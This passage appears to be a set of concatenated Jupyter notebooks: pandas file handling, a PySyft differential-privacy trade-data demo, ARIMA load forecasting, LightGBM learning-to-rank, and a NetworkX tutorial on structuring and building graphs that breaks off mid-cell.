#Saving the 'dataframe' dataframe as a .csv file dataframe.to_csv('dataframe.csv', sep=';', decimal=',', index=False) #Reading the .csv file and saving in the 'dataframe_lido' dataframe dataframe_lido = pd.read_csv('dataframe.csv', sep=';', decimal=',') #Showing the head from the 'dataframe_lido' dataframe dataframe_lido.head() #Reading the 'train.csv' file df = pd.read_csv('train.csv') df #Creating a 'aux' dataframe with some characteristics from the 'train.csv' file aux = pd.DataFrame({'colunas': df.columns, 'tipos': df.dtypes, 'percentual_faltante': df.isna().sum() / df.shape[0]}) aux #Complete the NaN data on the numeric 'Age' column with the mode of the column df['Age'] = df['Age'].fillna(df['Age'].mode()) #Complete the NaN data on the categorical 'Cabin' column with 'Unknown' df['Cabin'] = df['Cabin'].fillna('Unknown') #Showing the sum of values from the 'Cabin' column df['Cabin'].value_counts() #Showing the number of rows and columns from the 'df' dataframe df.shape ``` #### 6. Manipulando Arquivos .json ``` json = pd.read_json('https://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/index.json') json.reset_index(inplace=True) json['offers'][99] json['index'] ```
github_jupyter
### Trade Demo #### Goals: - Login to the Canada domain. - Select the dataset. - Cacluate the sum of total of good imported to Egypt. - Publish the result - Download the results ### Step 1: Login into the Canada domain ``` %load_ext autoreload %autoreload 2 # As a Data Scientist we want to perform some analysis on the trade dataset available on the Canada domain. # Our goal is to calculate the sum total of the goods imported (imports + re-imports) to Egypt import syft as sy # Let's login into the canada domain # canada_domain_node = sy.login(email="sheldon@caltech.edu", password="bazinga", port=8081) canada_domain_node = sy.login(email="info@openmined.org", password="changethis", port=8081) ``` ### Step 2: Select the dataset ``` # Awesome !!! We're logged into the domain node # Let's quickly list all the datasets available on the Canada domain canada_domain_node.datasets feb2020 = canada_domain_node.datasets[-1]['feb2020'] # Let's try to get the whole dataset itself. feb2020.request(reason="Access whole dataset") ``` #### STOP: Return to Data Owner-Canada.ipynb - STEP 8!! ### Step 3: Try to download the whole dataset ``` # Let's see if our request was accepted out = feb2020.publish(client=canada_domain_node ,sigma=1.0) out.get() # Seems, like the request to download the whole dataset was denied by the Data Owner. ``` ### Step 4: Private - Public Mutiplication # dataset_columns = [ "Classification", "Year", "Period", "Period Desc.", "Aggregate Level", "Is Leaf Code", "Trade Flow Code", "Trade Flow", "Reporter Code", "Reporter", "Reporter ISO", "Partner Code", "Partner", "Partner ISO", "Commodity Code", "Commodity", "Qty Unit Code", "Qty Unit", "Qty", "Netweight (kg)", "Trade Value (US$)", "Flag", ] # Since the columns are represented by indicies in the private tensor, # let's create a column to index map. column_to_index_map = {c: i for i, c in enumerate(dataset_columns)} column_to_index_map ``` # Let's calculate the value of the goods imported from Egypt. # Patner Code for Egypt is : 818 partner_code_for_egypt = 818 trade_flow_codes_map = { "imports": 1, "exports": 2, "re-exports":3, "re-imports":4, } # Breaking it down partner_codes = feb2020[:, column_to_index_map["Partner Code"]] trade_flow_code = feb2020[:, column_to_index_map["Trade Flow Code"]] egypt_mask = partner_codes == partner_code_for_egypt imports_mask = trade_flow_code == trade_flow_codes_map["imports"] # Let's calculate the good imported from Egypt value_of_goods_imported_from_egypt_mask = egypt_mask * imports_mask out = value_of_goods_imported_from_egypt_mask.publish(client=canada_domain_node ,sigma=1.0) out.get() # Let's continue with the analysis remotely. # Let's calculate the value of the goods import from Egypt. value_of_goods_reimported_from_egypt_mask = ( feb2020[:, column_to_index_map["Partner Code"]] == partner_code_for_egypt ) * (feb2020[:, column_to_index_map["Trade Flow Code"]] == trade_flow_codes_map["re-imports"]) # Selecting Trade values for imports and re-imports (Private - Private Multiplication) value_of_goods_imported_from_egypt = feb2020[:, column_to_index_map["Trade Value (US$)"]] * value_of_goods_imported_from_egypt_mask value_of_goods_reimported_from_egypt = feb2020[:, column_to_index_map["Trade Value (US$)"]] * value_of_goods_reimported_from_egypt_mask # Let's scale the trade value by 1000 - (Private - Public Multiplication) scaled_value_of_goods_imported_from_egypt = value_of_goods_imported_from_egypt * (0.001) scaled_value_of_goods_reimported_from_egypt = value_of_goods_reimported_from_egypt * (0.001) ``` ### Step 5: Private - Private Addition ``` # sigma -> Amount of noise added to the response. # Larger the sigma, smaller the budget spent. # Calculating th total imported goods (Private - Private Addition) private_total_imported_goods_value = scaled_value_of_goods_imported_from_egypt + scaled_value_of_goods_reimported_from_egypt private_total_imported_goods_value = private_total_imported_goods_value.sum() public_total_imported_goods_value = private_total_imported_goods_value.publish(client=canada_domain_node ,sigma=1.0) print(private_total_imported_goods_value.id_at_location) print(public_total_imported_goods_value.id_at_location) private_total_imported_goods_value.update_searchability(pointable=True) ``` ### Step 6: Download Results ``` # Let's download the results canada_domain_node.store total_imported_goods_value = public_total_imported_goods_value.get() print(f"Total trade value($) of the goods Imported from Egypt to Canada: ${total_imported_goods_value}") # b65f0512fd814ec58520b9cf009cada1> ``` *Great !!! We successfully, finished our analysis.* # CONGRATULATIONS!!! You've finished the demo!
github_jupyter
# One step univariate model - ARIMA In this notebook, we demonstrate how to: - prepare time series data for training an ARIMA times series forecasting model - implement a simple ARIMA model to forecast the next HORIZON steps ahead (time *t+1* through *t+HORIZON*) in the time series - evaluate the model on a test dataset The data in this example is taken from the GEFCom2014 forecasting competition<sup>1</sup>. It consists of 3 years of hourly electricity load and temperature values between 2012 and 2014. The task is to forecast future values of electricity load. In this example, we show how to forecast one time step ahead, using historical load data only. <sup>1</sup>Tao Hong, Pierre Pinson, Shu Fan, Hamidreza Zareipour, Alberto Troccoli and Rob J. Hyndman, "Probabilistic energy forecasting: Global Energy Forecasting Competition 2014 and beyond", International Journal of Forecasting, vol.32, no.3, pp 896-913, July-September, 2016. ``` import sys sys.path.append('..') import os import warnings import matplotlib.pyplot as plt import numpy as np import pandas as pd import datetime as dt import math from pandas.tools.plotting import autocorrelation_plot from pyramid.arima import auto_arima from statsmodels.tsa.statespace.sarimax import SARIMAX from sklearn.preprocessing import MinMaxScaler from common.utils import load_data, mape %matplotlib inline pd.options.display.float_format = '{:,.2f}'.format np.set_printoptions(precision=2) warnings.filterwarnings("ignore") # specify to ignore warning messages # Set for demo purposes (shorter run) demo = False ``` Load the data from csv into a Pandas dataframe ``` energy = load_data('../data')[['load']] energy.head() ``` Plot all available load data (January 2012 to Dec 2014) ``` energy.plot(y='load', subplots=True, figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` Plot first week of July 2014 ``` energy['2014-07-01':'2014-07-07'].plot(y='load', subplots=True, figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` ## Create training and testing data sets We separate our dataset into train and test sets. We train the model on the train set. After the model has finished training, we evaluate the model on the test set. We must ensure that the test set cover a later period in time from the training set, to ensure that the model does not gain from information from future time periods. We will allocate the period 1st September 2014 to 31st October to training set (2 months) and the period 1st November 2014 to 31st December 2014 to the test set (2 months). Since this is daily consumption of energy, there is a strong seasonal pattern, but the consumption is most similar to the consumption in the recent days. Therefore, using a relatively small window of time for training the data should be sufficient. ``` train_start_dt = '2014-11-01 00:00:00' if(not demo): test_start_dt = '2014-12-01 00:00:00' else: test_start_dt = '2014-12-30 00:00:00' energy[(energy.index < test_start_dt) & (energy.index >= train_start_dt)][['load']].rename(columns={'load':'train'}) \ .join(energy[test_start_dt:][['load']].rename(columns={'load':'test'}), how='outer') \ .plot(y=['train', 'test'], figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` ## Data preparation Our data preparation for the training set will involve the following steps: 1. Filter the original dataset to include only that time period reserved for the training set 2. Scale the time series such that the values fall within the interval (0, 1) Create training set containing only the model features ``` train = energy.copy()[(energy.index >= train_start_dt) & (energy.index < test_start_dt)][['load']] test = energy.copy()[energy.index >= test_start_dt][['load']] print('Training data shape: ', train.shape) print('Test data shape: ', test.shape) ``` Scale data to be in range (0, 1). This transformation should be calibrated on the training set only. This is to prevent information from the validation or test sets leaking into the training data. ``` scaler = MinMaxScaler() train['load'] = scaler.fit_transform(train) train.head(10) ``` Original vs scaled data: ``` energy[energy.index < train_start_dt][['load']].rename(columns={'load':'original load'}).plot.hist(bins=100, fontsize=12) train.rename(columns={'load':'scaled load'}).plot.hist(bins=100, fontsize=12) plt.show() ``` Let's also scale the test data ``` test['load'] = scaler.transform(test) test.head() ``` ## Implement ARIMA method An ARIMA, which stands for **A**uto**R**egressive **I**ntegrated **M**oving **A**verage, model can be created using the statsmodels library. In the next section, we perform the following steps: 1. Define the model by calling SARIMAX() and passing in the model parameters: p, d, and q parameters, and P, D, and Q parameters. 2. The model is prepared on the training data by calling the fit() function. 3. Predictions can be made by calling the forecast() function and specifying the number of steps (horizon) which to forecast In an ARIMA model there are 3 parameters that are used to help model the major aspects of a times series: seasonality, trend, and noise. These parameters are: - **p** is the parameter associated with the auto-regressive aspect of the model, which incorporates past values. - **d** is the parameter associated with the integrated part of the model, which effects the amount of differencing to apply to a time series. - **q** is the parameter associated with the moving average part of the model. If our model has a seasonal component, we use a seasonal ARIMA model (SARIMA). In that case we have another set of parameters: P, D, and Q which describe the same associations as p,d, and q, but correspond with the seasonal components of the model. ``` # Specify the number of steps to forecast ahead HORIZON = 3 if demo else 24 ``` Let’s look at an autocorrelation plot of the time series. The example below plots the autocorrelation for 48 lags in the time series. ``` autocorrelation_plot(train[1:48]) plt.show() ``` We can see that there is a significant positive correlation with the first 4 or 5 lags. That may be a good starting point for the AR parameter (p) of the model. The plot of energy load over time (see above) shows that the time series is not stationary due to its seasonality (daily peaks and also peaks in August and February due to the increased energy usage). This suggests the a certain degree of differencing the data might be necessary. ``` train['load'].diff(periods=24).plot(y='load', figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` Even after differencing the data by 24 hours (the seasonal frequency), we still see a seasonal trend in the data. Selecting the best parameters for an Arima model can be challenging - somewhat subjective and time intesive, so we'll leave it as an exercise to the user. We used an **auto_arima()** function to search a provided space of parameters for the best model. ``` # Model search takes a while, so don't run it during the demo auto_tune = False if (auto_tune): auto_model = auto_arima(train, start_p=1, start_q=0, max_p=5, max_q=0, m=24, start_P=0, max_P=2,Q=0, seasonal=True, d=1, D=1, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True) print(auto_model.aic()) print(auto_model.summary()) order = (4, 1, 0) seasonal_order = (1, 1, 0, 24) model = SARIMAX(endog=train, order=order, seasonal_order=seasonal_order) results = model.fit() print(results.summary()) ``` Next we display the distribution of residuals. A zero mean in the residuals may indicate that there is no bias in the prediction. ``` # plot residual errors residuals = pd.DataFrame(results.resid[0:100]) residuals.plot() plt.show() residuals.plot(kind='kde') plt.show() print(residuals.describe()) ``` ## Evaluate the model We will perform the so-called **walk forward validation**. In practice, time series models are re-trained each time a new data becomes available. This allows the model to make the best forecast at each time step. Starting at the beginning of the time series, we train the model on the train data set. Then we make a prediction on the next time step. The prediction is then evaluated against the known value. The training set is then expanded to include the known value and the process is repeated. (Note that we keep the training set window fixed, for more efficient training, so every time we add a new observation to the training set, we remove the observation from the beginning of the set.) This process provides a more robust estimation of how the model will perform in practice. However, it comes at the computation cost of creating so many models. This is acceptable if the data is small or if the model is simple, but could be an issue at scale. Walk-forward validation is the gold standard of time series model evaluation and is recommended for your own projects. Create a test data point for each HORIZON step. ``` test_shifted = test.copy() for t in range(1, HORIZON): test_shifted['load+'+str(t)] = test_shifted['load'].shift(-t, freq='H') test_shifted = test_shifted.dropna(how='any') test_shifted.head(5) ``` Make predictions on the test data ``` %%time training_window = 720 # dedicate 30 days (720 hours) for training train_ts = train['load'] test_ts = test_shifted history = [x for x in train_ts] history = history[(-training_window):] predictions = list() for t in range(test_ts.shape[0]): model = SARIMAX(endog=history, order=order, seasonal_order=seasonal_order) model_fit = model.fit() yhat = model_fit.forecast(steps = HORIZON) predictions.append(yhat) obs = list(test_ts.iloc[t]) # move the training window history.append(obs[0]) history.pop(0) print(t+1, '. Predicting time step: ', test_ts.index[t]) # print(t+1, ': predicted =', yhat, 'expected =', obs) ``` Compare predictions to actual load ``` eval_df = pd.DataFrame(predictions, columns=['t+'+str(t) for t in range(1, HORIZON+1)]) eval_df['timestamp'] = test.index[0:len(test.index)-HORIZON+1] eval_df = pd.melt(eval_df, id_vars='timestamp', value_name='prediction', var_name='h') eval_df['actual'] = np.array(np.transpose(test_ts)).ravel() eval_df[['prediction', 'actual']] = scaler.inverse_transform(eval_df[['prediction', 'actual']]) eval_df.head() ``` Compute the mean absolute percentage error over all predictions ``` if(HORIZON > 1): eval_df['APE'] = (eval_df['prediction'] - eval_df['actual']).abs() / eval_df['actual'] print(eval_df.groupby('h')['APE'].mean()) print('One step forecast MAPE: ', (mape(eval_df[eval_df['h'] == 't+1']['prediction'], eval_df[eval_df['h'] == 't+1']['actual']))*100, '%') print('One step forecast MAPE: ', mape(eval_df['prediction'], eval_df['actual'])*100, '%') ``` Plot the predictions vs the actuals for the first week of the test set ``` if(HORIZON == 1): ## Plotting single step forecast eval_df.plot(x='timestamp', y=['actual', 'prediction'], style=['r', 'b'], figsize=(15, 8)) else: ## Plotting multi step forecast plot_df = eval_df[(eval_df.h=='t+1')][['timestamp', 'actual']] for t in range(1, HORIZON+1): plot_df['t+'+str(t)] = eval_df[(eval_df.h=='t+'+str(t))]['prediction'].values fig = plt.figure(figsize=(15, 8)) ax = plt.plot(plot_df['timestamp'], plot_df['actual'], color='red', linewidth=4.0) ax = fig.add_subplot(111) for t in range(1, HORIZON+1): x = plot_df['timestamp'][(t-1):] y = plot_df['t+'+str(t)][0:len(x)] ax.plot(x, y, color='blue', linewidth=4*math.pow(.9,t), alpha=math.pow(0.8,t)) ax.legend(loc='best') plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ```
github_jupyter
## Probemos un poquito Learning to Rank con la librería LightGBM Seguimos el ejemplo del código en https://mlexplained.com/2019/05/27/learning-to-rank-explained-with-code/ Para eso hay que descargar los datos con el archivo trans_data.py, ejecutando retrieve_30k.sh #### Para Linux Si el sistema que corren es Linux, se puede ejecutar la celda siguiente. ``` ! sh retrieve_30k.sh ``` #### Para Windows En el caso de Windows, deben tener instalado [7zip](https://www.7-zip.org/) primero. Luego deberán ejecutar las siguientes celdas. ``` !pip install patool import os import patoolib import requests rarfile = requests.get("https://s3-us-west-2.amazonaws.com/xgboost-examples/MQ2008.rar") with open("./MQ2008.rar", "wb") as fh: fh.write(rarfile.content) patoolib.extract_archive("./MQ2008.rar", outdir="./") os.system("move /-y MQ2008\Fold1\*.txt .") !python trans_data.py train.txt mq2008.train mq2008.train.group !python trans_data.py test.txt mq2008.test mq2008.test.group !python trans_data.py vali.txt mq2008.vali mq2008.vali.group ``` ## Learning to Rank ``` # Importemos las librerías más importantes import lightgbm as lgb import numpy as np from sklearn.datasets import load_svmlight_file from scipy.stats import spearmanr # Carguemos los archivos que pudimos bajar con el script trans_data.py x_train, y_train = load_svmlight_file("mq2008.train") x_valid, y_valid = load_svmlight_file("mq2008.vali") x_test, y_test = load_svmlight_file("mq2008.test") y_train q_train = np.loadtxt('mq2008.train.group') q_valid = np.loadtxt('mq2008.vali.group') q_test = np.loadtxt('mq2008.test.group') x_test q_test y_test[:8] # LGBMRanker doc: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRanker.html gbm = lgb.LGBMRanker() gbm.fit( x_train, y_train, group=q_train, eval_set=[(x_valid, y_valid)], eval_group=[q_valid], eval_at=[1, 3], early_stopping_rounds=20, verbose=True, callbacks=[lgb.reset_parameter(learning_rate=lambda x: 0.95 ** x * 0.1)] ) # Tiremos el predictor sobre los datos de test preds_test = gbm.predict(x_test) preds_test # Usemos la métrica de Spearman para correlación de Rankings # https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.spearmanr.html spearmanr(y_test, preds_test) ``` ## Agrupemos todo el dataset y reentrenemos! ``` q_train = [x_train.shape[0]] q_valid = [x_valid.shape[0]] q_test = [x_test.shape[0]] gbm = lgb.LGBMRanker() gbm.fit( x_train, y_train, group=q_train, eval_set=[(x_valid, y_valid)], eval_group=[q_valid], eval_at=[1, 3], early_stopping_rounds=20, verbose=True, callbacks=[lgb.reset_parameter(learning_rate=lambda x: 0.95 ** x * 0.1)] ) preds_test = gbm.predict(x_test) preds_test spearmanr(y_test, preds_test) ```
github_jupyter
This tutorial is Part 1 of an introduction to social network analysis in Python. It covers how to structure network data, as well as how to use NetworkX to: construct graphs, explore their features, and implement simple algorithms. The primary example used for replication is Zachary's (1977) paper on divisions within a collegiate karate club. The paper is available [here](https://www.jstor.org/stable/pdf/3629752.pdf) and is the source of all tables/figures included below. We use the built-in dataset available from NetworkX, supplemented with a parsed and cleaned version of the weights provided [here](http://vlado.fmf.uni-lj.si/pub/networks/data/ucinet/ucidata.htm#zachary). <h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc"><ul class="toc-item"><li><span><a href="#Working-with-network-data" data-toc-modified-id="Working-with-network-data-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Working with network data</a></span><ul class="toc-item"><li><span><a href="#Structuring-network-data" data-toc-modified-id="Structuring-network-data-1.1"><span class="toc-item-num">1.1&nbsp;&nbsp;</span>Structuring network data</a></span><ul class="toc-item"><li><span><a href="#(Optional)-Subway-example" data-toc-modified-id="(Optional)-Subway-example-1.1.1"><span class="toc-item-num">1.1.1&nbsp;&nbsp;</span>(Optional) Subway example</a></span></li></ul></li><li><span><a href="#Types-of-network-datasets" data-toc-modified-id="Types-of-network-datasets-1.2"><span class="toc-item-num">1.2&nbsp;&nbsp;</span>Types of network datasets</a></span></li><li><span><a href="#Storing-network-data" data-toc-modified-id="Storing-network-data-1.3"><span class="toc-item-num">1.3&nbsp;&nbsp;</span>Storing network data</a></span></li></ul></li><li><span><a href="#Preparing-network-data-with-NetworkX" data-toc-modified-id="Preparing-network-data-with-NetworkX-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Preparing network data with NetworkX</a></span><ul class="toc-item"><li><span><a href="#Building-a-graph-from-scratch" data-toc-modified-id="Building-a-graph-from-scratch-2.1"><span class="toc-item-num">2.1&nbsp;&nbsp;</span>Building a graph from scratch</a></span><ul class="toc-item"><li><span><a href="#Initializing-a-graph" data-toc-modified-id="Initializing-a-graph-2.1.1"><span class="toc-item-num">2.1.1&nbsp;&nbsp;</span>Initializing a graph</a></span></li><li><span><a href="#Adding-nodes" data-toc-modified-id="Adding-nodes-2.1.2"><span class="toc-item-num">2.1.2&nbsp;&nbsp;</span>Adding nodes</a></span></li><li><span><a href="#Adding-edges" data-toc-modified-id="Adding-edges-2.1.3"><span class="toc-item-num">2.1.3&nbsp;&nbsp;</span>Adding edges</a></span></li></ul></li><li><span><a href="#Building-a-graph-from-an-edgelist" data-toc-modified-id="Building-a-graph-from-an-edgelist-2.2"><span class="toc-item-num">2.2&nbsp;&nbsp;</span>Building a graph from an edgelist</a></span></li><li><span><a href="#Building-special-graph-types" data-toc-modified-id="Building-special-graph-types-2.3"><span class="toc-item-num">2.3&nbsp;&nbsp;</span>Building special graph types</a></span><ul class="toc-item"><li><span><a href="#Weighted-graphs" data-toc-modified-id="Weighted-graphs-2.3.1"><span class="toc-item-num">2.3.1&nbsp;&nbsp;</span>Weighted graphs</a></span></li><li><span><a href="#Directed-graphs" data-toc-modified-id="Directed-graphs-2.3.2"><span class="toc-item-num">2.3.2&nbsp;&nbsp;</span>Directed graphs</a></span></li></ul></li><li><span><a href="#Importing-built-in-graphs" data-toc-modified-id="Importing-built-in-graphs-2.4"><span class="toc-item-num">2.4&nbsp;&nbsp;</span>Importing built-in graphs</a></span></li></ul></li><li><span><a href="#Analyzing-network-data" data-toc-modified-id="Analyzing-network-data-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Analyzing network data</a></span><ul class="toc-item"><li><span><a href="#Inspecting-graphs" data-toc-modified-id="Inspecting-graphs-3.1"><span class="toc-item-num">3.1&nbsp;&nbsp;</span>Inspecting graphs</a></span><ul class="toc-item"><li><span><a href="#Graph-size" data-toc-modified-id="Graph-size-3.1.1"><span class="toc-item-num">3.1.1&nbsp;&nbsp;</span>Graph size</a></span></li><li><span><a href="#Node-data" data-toc-modified-id="Node-data-3.1.2"><span class="toc-item-num">3.1.2&nbsp;&nbsp;</span>Node data</a></span></li><li><span><a href="#Edge-data" data-toc-modified-id="Edge-data-3.1.3"><span class="toc-item-num">3.1.3&nbsp;&nbsp;</span>Edge data</a></span></li></ul></li><li><span><a href="#Local-structure" data-toc-modified-id="Local-structure-3.2"><span class="toc-item-num">3.2&nbsp;&nbsp;</span>Local structure</a></span><ul class="toc-item"><li><span><a href="#Exploring-neighbors" data-toc-modified-id="Exploring-neighbors-3.2.1"><span class="toc-item-num">3.2.1&nbsp;&nbsp;</span>Exploring neighbors</a></span></li><li><span><a href="#Exploring-degree" data-toc-modified-id="Exploring-degree-3.2.2"><span class="toc-item-num">3.2.2&nbsp;&nbsp;</span>Exploring degree</a></span></li><li><span><a href="#Local-bridges" data-toc-modified-id="Local-bridges-3.2.3"><span class="toc-item-num">3.2.3&nbsp;&nbsp;</span>Local bridges</a></span></li><li><span><a href="#Connected-components" data-toc-modified-id="Connected-components-3.2.4"><span class="toc-item-num">3.2.4&nbsp;&nbsp;</span>Connected components</a></span></li></ul></li><li><span><a href="#Algorithms" data-toc-modified-id="Algorithms-3.3"><span class="toc-item-num">3.3&nbsp;&nbsp;</span>Algorithms</a></span><ul class="toc-item"><li><span><a href="#Shortest-path" data-toc-modified-id="Shortest-path-3.3.1"><span class="toc-item-num">3.3.1&nbsp;&nbsp;</span>Shortest path</a></span></li><li><span><a href="#Max-flow-/-min-cut" data-toc-modified-id="Max-flow-/-min-cut-3.3.2"><span class="toc-item-num">3.3.2&nbsp;&nbsp;</span>Max flow / min cut</a></span><ul class="toc-item"><li><span><a href="#Find-the-minimum-cut" data-toc-modified-id="Find-the-minimum-cut-3.3.2.1"><span class="toc-item-num">3.3.2.1&nbsp;&nbsp;</span>Find the minimum cut</a></span></li></ul></li></ul></li></ul></li><li><span><a href="#Exporting-NetworkX-graphs-to-other-data-structures" data-toc-modified-id="Exporting-NetworkX-graphs-to-other-data-structures-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Exporting NetworkX graphs to other data structures</a></span><ul class="toc-item"><li><span><a href="#As-edgelist" data-toc-modified-id="As-edgelist-4.1"><span class="toc-item-num">4.1&nbsp;&nbsp;</span>As edgelist</a></span></li><li><span><a href="#As-dictionary" data-toc-modified-id="As-dictionary-4.2"><span class="toc-item-num">4.2&nbsp;&nbsp;</span>As dictionary</a></span></li><li><span><a href="#As-adjacency-matrix" data-toc-modified-id="As-adjacency-matrix-4.3"><span class="toc-item-num">4.3&nbsp;&nbsp;</span>As adjacency matrix</a></span></li></ul></li><li><span><a href="#Wrap-up" data-toc-modified-id="Wrap-up-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>Wrap-up</a></span><ul class="toc-item"><li><span><a href="#Plots" data-toc-modified-id="Plots-5.1"><span class="toc-item-num">5.1&nbsp;&nbsp;</span>Plots</a></span></li><li><span><a href="#Conclusion" data-toc-modified-id="Conclusion-5.2"><span class="toc-item-num">5.2&nbsp;&nbsp;</span>Conclusion</a></span></li></ul></li></ul></div> Let's get started! First, we need to import all of the packages we'll use to do our analysis. ``` import pandas as pd # For analyzing tabular data import numpy as np # For working with arrays and numerical operations import networkx as nx # For network data specifically import matplotlib.pyplot as plt # For making plots from pyvis import network as pv # For making interactive plots import pprint # For making output easier to read %matplotlib inline pd.set_option('display.max_columns', None) # For preventing horizontal shortening of tables when displayed print(nx.__version__) # Confirm that we have the latest networkx version ``` # Working with network data ## Structuring network data The first challenge you'll face is figuring out how to structure your network data: - What entities will form the **nodes** or **vertices**? - What will define the **edges** or **links**? In some cases the answer may seem obvious. For example, we are used to thinking about friendship networks, in which the nodes are people, and the edges are personal connections. In other cases, the natural representation is less clear. <div class="alert alert-success"> <b>Example:</b> Consider the Spotify dataset. - Are nodes: songs, albums, artists, playlists, genres, or listeners? - What should the links between these entities be? There are many different possible ways to structure this data. The right answer will depend on the question you're asking. </div> ### (Optional) Subway example For example, consider the NYC subway. An intuitive representation might have subway stops as nodes, and subway lines as edges: <img src="figures/degree.png" style="width: 500px;"/> However, we could also build a network of lines connected by transfers: <img src="figures/c_space.png" style="width: 500px;"/> Or a bi-partite network in which nodes are lines and stations, and edges represent the fact that a line stops at a station: <img src="figures/b_space.png" style="width: 700px;"/> ## Types of network datasets Once you have your nodes and edges, recall that there are two helpful dimensions along which networks can be categorized: 1. Whether their edges are **directed** or **undirected** 2. Whether their edges are **weighted** or **unweighted** In this tutorial, we will discuss how to store and work with data from these different types of networks. ``` H = nx.DiGraph([('A', 'B'), ('A', 'E'), ('B', 'C'), ('B', 'D'), ('C', 'D'), ('D', 'A'), ('E', 'D')]) fig, ax = plt.subplots(2,2, figsize=[7,7]) pos = nx.kamada_kawai_layout(H) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[0][0]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrowsize=30, width=3, ax=ax[0][1]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[1][0]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[1][1]) heavy = [('E', 'D'), ('B', 'D'), ('C', 'D')] medium = [('A', 'E'), ('D', 'A')] nx.draw_networkx_edges(H, pos=pos, edgelist=heavy, width=10, ax=ax[1][1]) nx.draw_networkx_edges(H, pos=pos, edgelist=medium, width=5, ax=ax[1][1]) ax[0][0].set_title("Undirected") ax[0][1].set_title("Directed") ax[1][0].set_title("Unweighted") ax[1][1].set_title("Weighted") plt.show() ``` ## Storing network data One of the first challenges of working with network data is to figure out how to store information about the network structure. There are three common ways to store network structure data: 1. **An edge list** has one row for each edge, containing the origin node and the destination node. 2. **A dictionary** has one key per node, which corresponds to a list of the node's neighbors. 3. **An adjacency matrix** has one entry _per_ possible edge, set to 1 if the edge exists and 0 otherwise. Consider the following example: ``` fig, ax = plt.subplots(1,1, figsize=[4,4]) nx.draw_kamada_kawai(H,node_color='cornflowerblue', node_size=1000, arrows=True, width=3, with_labels=True, font_size=20, ax=ax) ``` Edge list: Dictionary: Adjacency matrix: __________ ___________ _________________ A,B A: B,E A B C D E A,E B: C,D A 0 1 0 0 1 B,C C: D B 0 0 1 1 0 B,D D: A C 0 0 0 1 0 C,D E: D D 1 0 0 0 0 D,A E 0 0 0 1 0 E,D Observe that the storage requirements for each of these data structures is very different. For example, an adjacency matrix has to store lots of zero entries, so in sparse graphs we might prefer to use edge lists or dictionaries. <div class="alert alert-success"> <b>Question:</b> How would the adjacency matrix look different if the graph was weighted? If the graph was undirected? Altogether, we can think of four main pieces of information that we'll need to store: **nodes, edges, node attributes, and edge attributes.** Attribute information could be attached to one of the data structures above, or stored in a separate dataset. - For example, the cells of an adjacency matrix might contain information on weights. - For example, information about nodes (e.g. demographic characteristics) might be kept in a separate table. # Preparing network data with NetworkX Let's start with a simple example using the graph above. This will help us build some intuition on the networkX package. We will rely on the following commands: ```python nx.Graph() # Initialize a graph nx.DiGraph() # Initialize a directed graph G.clear() # Clear the graph G.is_empty() # Confirm that the graph is empty G.add_edge() # Add/remove single nodes/edges from graph G.add_node() G.remove_edge() G.remove_nodes() G.add_edges_from([...]) # Add/remove a list of multiple nodes/edges from graph G.add_nodes_from([...]) G.remove_edges_from([...]) G.remove_nodes_from([...]) ``` ## Building a graph from scratch Let's build a simple graph from scratch. For this exercise, let's pretend that we're trying to map which NYU schools allow their students to cross-enroll with another. ### Initializing a graph ``` # Let's create an empty graph G = nx.Graph() # Sadly, there are no nodes or edges, which we can see if we plot: nx.draw(G, with_labels=True) # As we can confirm, it's empty nx.is_empty(G) ``` ### Adding nodes ``` # Add a single node ... G.add_node('Steinhardt') nx.draw(G, with_labels=True) # ... or a list of nodes G.add_nodes_from(['Stern', 'Courant', 'Silver', 'Wagner', 'Tandon']) nx.draw(G, with_labels=True) ``` ### Adding edges ``` # Add a single edge... G.add_edge('Silver', 'Steinhardt') nx.draw(G, with_labels=True) # ... or a list of edges G.add_edges_from([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon') ]) # Let's see if it worked: nx.draw(G, with_labels=True) ``` ## Building a graph from an edgelist Alternatively, you can just supply a list of edges to the graph ``` H = nx.Graph([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon'), ('Silver', 'Steinhardt') ]) nx.draw(H, with_labels=True) ``` ## Building special graph types ### Weighted graphs We can specify a weighted graph by including a dictionary with the weight as an attribute. ``` H.clear() H = nx.Graph([ ('Stern' , 'Courant', {'weight': 5}), ('Tandon', 'Courant', {'weight': 7}), ('Wagner', 'Silver', {'weight': 1}), ('Wagner', 'Steinhardt', {'weight': 2}), ('Wagner', 'Stern', {'weight': 9}), ('Wagner', 'Tandon', {'weight': 3}), ('Silver', 'Steinhardt', {'weight': 6}) ]) nx.draw(H, with_labels=True) H.edges.data() ``` ### Directed graphs We specify a directed graph using `nx.DiGraph` instead of `nx.Graph` ``` H.clear() H = nx.DiGraph([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon'), ('Silver', 'Steinhardt') ]) nx.draw(H, 